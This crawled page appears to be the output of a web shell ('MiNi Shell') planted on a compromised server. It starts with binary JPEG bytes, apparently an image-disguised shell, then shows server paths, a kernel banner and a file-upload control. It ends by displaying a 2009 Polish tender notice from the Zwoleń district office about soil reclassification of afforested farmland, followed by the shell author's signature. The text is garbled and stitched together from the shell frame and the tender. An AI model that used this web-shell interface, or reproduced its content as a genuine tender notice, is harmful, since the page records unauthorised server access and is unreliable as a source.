JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090130/12442-N-2009.html

<p class="kh_header"><b>Zwoleń: Ponowna gleboznawcza klasyfikacja zmienionych klas gruntów i użytków rolnych 
( grunty zalesione w ramach 5 PROW Zalesienie  gruntów rolnych)</b><br>
<b>Numer ogłoszenia: 12442 - 2009; data zamieszczenia: 30.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Zwoleniu , ul. Władysława Jagiełły 4, 26-700 Zwoleń, woj. mazowieckie, tel. 048 6763389 w. 16, 6763779w.26, faks 048 6762520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwolenpowiat.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zwolenpowiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ponowna gleboznawcza klasyfikacja zmienionych klas gruntów i użytków rolnych 
( grunty zalesione w ramach 5 PROW Zalesienie  gruntów rolnych).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest -Ponowna  gleboznawcza klasyfikacja zmienionych  
klas gruntów i użytków rolnych ( grunty zalesione w ramach 5PROW zalesienie  
gruntów rolnych.
 Lokalizacja zamówienia: 
a. gm. Kazanów obręby: Wólka Gonciarska, Ostrówka, Niedarczów Dolny Wieś, Niedarczów Dolny Kolonia  działek 8;
b. gm. Policzna obręb: Policzna działek 1;
c. gm. Przyłęk obręb: Lucimia, Andrzejów, Ławeczko Nowe, Ławeczko Stare, Łaguszów, Ignaców, działek 20;
d. gm. Tczów obręby: Julianów działek 1;
e.  gm. Zwoleń obręb: Osiny działek 1; 
Obrębów 13, ilość działek 31, jednostek rejestrowanych 15
 -kod CPV 71351500-8- usługi badania gleby
1. Zakres przedmiotu zamówienia został określony w załączniku nr 1 do niniejszej SIWZ.
2. Zaleca się aby wykonawcy pozyskali dla siebie na swoją własną odpowiedzialność 
    i ryzyko wszelkie informacje, które mogą być niezbędne w przygotowaniu  oferty oraz  
    przy zawieraniu umowy. Koszty z tym związane poniesie wykonawca.
3. Zamówienie obejmuje wszystkie koszty wykonania usługi, a zwłaszcza koszty  
    wszystkich podatków ( VAT) i innych opłat związanych z wykonaniem usługi.
4. Wykonawca nie może powierzyć dostaw innym podwykonawcom .
5. Nazwa/ kod ustalone ze Wspólnego Słownika Zamówień: 
    usługi badania gleby 71351500-8

Warunki techniczne wykonania prac:
   - przeprowadzić analizę istniejących materiałów,
- wykonać klasyfikację zalesionych gruntów rolnych wraz z pomiarem w koniecznych  
  przypadkach,
   - w przypadku wystąpienia zmian w konturach przylegających do zalesionych 
     (nie objętych wydaną decyzją o prowadzeniu upraw leśnych) należy wykonać pomiar  
     i klasyfikację tych gruntów,
-składać, na bieżąco, wykonane operaty techniczne z przeprowadzonych prac w celu  
 przekazywania ich do kontroli przez uprawnionego Inspektora,
    po dokonaniu kontroli przekazanego operatu technicznego przez uprawnionego 
    Inspektora ds. kontroli klasyfikacji skorygować wszystkie błędy i wnieść zmiany na  
    mapy ewidencji gruntów analogowe oraz numeryczne oraz mapy dyżurne klasyfikacji  
    gruntów, 
  - do wykazów zmian gruntowych załączyć kserokopię map klasyfikacyjnych 
    z wprowadzonymi zmianami, 
  - wykonać zestawienie zleconych oraz faktycznie pomierzonych 
    i przeklasyfikowanych gruntów z uwzględnieniem występujących różnic 
    w powierzchni.

Prace należy wykonać zgodnie z obowiązującymi  przepisami prawnymi i technicznymi oraz wytycznymi dotyczącymi przedmiotu zamówienia w szczególności:
a) ustawa z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne ( tekst jednolity- 
    Dz. U z 2005 r. Nr 240, poz. 2027 ze zm.),
b) rozporządzenie Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 
    2001 r. w sprawie ewidencji gruntów i budynków ( Dz. U.  z 2001 r. Nr 38, poz. 454), c) instrukcja techniczna G- 5- Ewidencja gruntów i budynków,
d) instrukcja techniczna G- 4- Pomiary sytuacyjne i wysokościowe, 
e) instrukcja techniczna O-1- Ogólne zasady wykonywania prac geodezyjnych,
f) instrukcja techniczna O- 3 -zasady kompletowania dokumentacji geodezyjnej 
   i kartograficznej, 
g) rozporządzenie Rady Ministrów z dnia 4 czerwca 1956 r. w sprawie klasyfikacji  
   gruntów ( Dz. U z 1956 Nr 19 poz. 97 ze zm.), 
h) wytyczne zawarte w piśmie Wojewódzkiego Inspektora Nadzoru Geodezyjnego  
    i kartograficznego z dnia 10. 02. 2004 r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.35.15.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy potwierdzą spełnienie  poniższych warunków przedkładając w ofercie dokumenty zgodne z wykazem zawartym w części VI SIWZ t. j spełniają warunki udziału w postępowaniu określone 
w art. 22 ust.1 i nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  
    ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
 3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  
    zamówienia.
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
5) dysponują osobami o niezbędnych kwalifikacjach i umiejętnościach do wykonania   
    zamówienia tj. dysponują osobami posiadającymi uprawnienia zawodowe do  
    wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii, o których  
    mowa w art. 43 pkt 1 Ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne   
    ( tekst jednolity z 2005 r. Dz. U.  Nr 240 poz. 2027) oraz dysponują osobą posiadającą   
    uprawnienie do wykonywania klasyfikacji nadane  przez wojewodę oraz wpisaną na 
    listę wojewody mazowieckiego osób  upoważnionych  do wykonywania klasyfikacji 
    gruntów na terenie  województwa mazowieckiego. Szczegółowy wykaz sporządzony  
    zostanie zgodnie z załącznikiem nr 3. 
                                                                                              
Jawność postępowania.
1. Zamawiający  prowadzi protokół postępowania. 
2. Protokół postępowania wraz z załącznikami jest jawny. Załączniki do protokołu       
    udostępnia się po dokonaniu wyboru najkorzystniejszej oferty lub unieważnieniu  
    postępowania. Oferty są jawne od chwili ich otwarcia.
3. Zamawiający informuje, że zgodnie z art. 96 ust. 3 ustawy Prawo zamówień  
    publicznych oferty składane w postępowaniu o zamówienie publiczne są jawne 
    i podlegają udostępnieniu od chwili ich otwarcia, z wyjątkiem informacji stanowiących 
    tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej  
    konkurencji, jeśli Wykonawca nie później niż w terminie  składania ofert, zastrzegł, 
    że nie mogą one być udostępniane . Przez tajemnicę przedsiębiorstwa w rozumieniu 
    art. 11 ust.4 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji  
    (Dz. U. Nr 47 z dnia 8 czerwca 1993 r. poz.  211 ze zm.) rozumie się nie ujawnione do 
    wiadomości publicznej informacje techniczne, technologiczne, organizacyjne  
    przedsiębiorstwa lub inne informacje posiadające wartość gospodarczą, co do których   
    przedsiębiorca podjął niezbędne działania w celu zachowania ich poufności tzn.  
    zastrzegł sobie składając ofertę, iż nie mogą być one udostępnione innym uczestnikom  
    postępowania.
Stosowne zastrzeżenie Wykonawca winien złożyć na formularzu  ofertowym. 
W przeciwnym razie cała oferta zostanie ujawniona na życzenie każdej zainteresowanej osoby.
4. W przypadku zastrzeżenia informacji Wykonawca ma  obowiązek wydzielić z oferty   
    informację stanowiące tajemnicę przedsiębiorstwa i oznaczyć je klauzulą
   ,, NIE UDOSTĘPNIAĆ INFORMACJE STANOWIĄ TAJEMNICĘ  
    PRZEDSIĘBIORSTWA W ROZUMIENIU ART. 11 UST.4 USTAWY 
    O ZWALCZANIU NIWUCZCIWEJ KONKURENCJI. 
Uwaga: 
Zastrzeżenie informacji, które nie stanowią tajemnicy przedsiębiorstwa 
w rozumieniu ww. ustawy skutkować będzie odrzuceniem oferty na podstawie 
art. 89 ust.1 pkt. 1 ustawy Prawo zamówień publicznych.
Wykonawca w szczególności nie może  zastrzec informacji dotyczących  ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofercie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Każdy z wykonawców ma obowiązek złożyć następujące dokumenty potwierdzające  
    spełnienie warunków udziału w postępowaniu: 
1) oświadczenie  Wykonawcy, o spełnieniu warunków określonych  w art. 22 ustawy,   
    według wzoru, stanowiącego załącznik Nr 3 do niniejszej SIWZ.
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z wykonawców składających ofertę wspólną.  
2) aktualnego opisu  z właściwego rejestru albo aktualnego zaświadczenia  o wpisie do    
    ewidencji działalności  gospodarczej potwierdzające, że profil działalności   
    wykonawcy odpowiada przedmiotowi zamówienia, wystawionego nie wcześniej niż 
    6 miesięcy przed upływem terminu składania ofert;
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z wykonawców składających ofertę wspólną.  
3) umowę regulującą  współpracę podmiotów występujących wspólnie ( dotyczy 
     w szczególności  umowy spółki cywilnej, umowy konsorcjum itp.) 
4) Wykaz osób przewidzianych do realizacji zamówienia ( załącznik nr 4) wraz z kopiami  
    uprawnie ń zawodowych  o których mowa w części V pkt 5.
5) Wypełniony formularz ofertowy załącznik nr 2 do SIWZ.
6) Parafowany projekt umowy stosownie do załącznika Nr 5 do SIWZ

Uwaga
Do formy i treści dokumentów, składanych przez wykonawców, mających siedzibę lub miejsce zamieszkania za granicą stosuje się odpowiednio § 2 rozporządzenia Prezesa Rady Ministrów z dnia  19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich dokumenty mogą być składane ( Dz. U. Nr 87 poz. 605).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.zwolenpowiat.finn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Zwoleniu
ul. Jagiełły 4
26-700 Zwoleń.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Zwoleniu
ul.Jagieły 4
26-700 Zwoleń.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com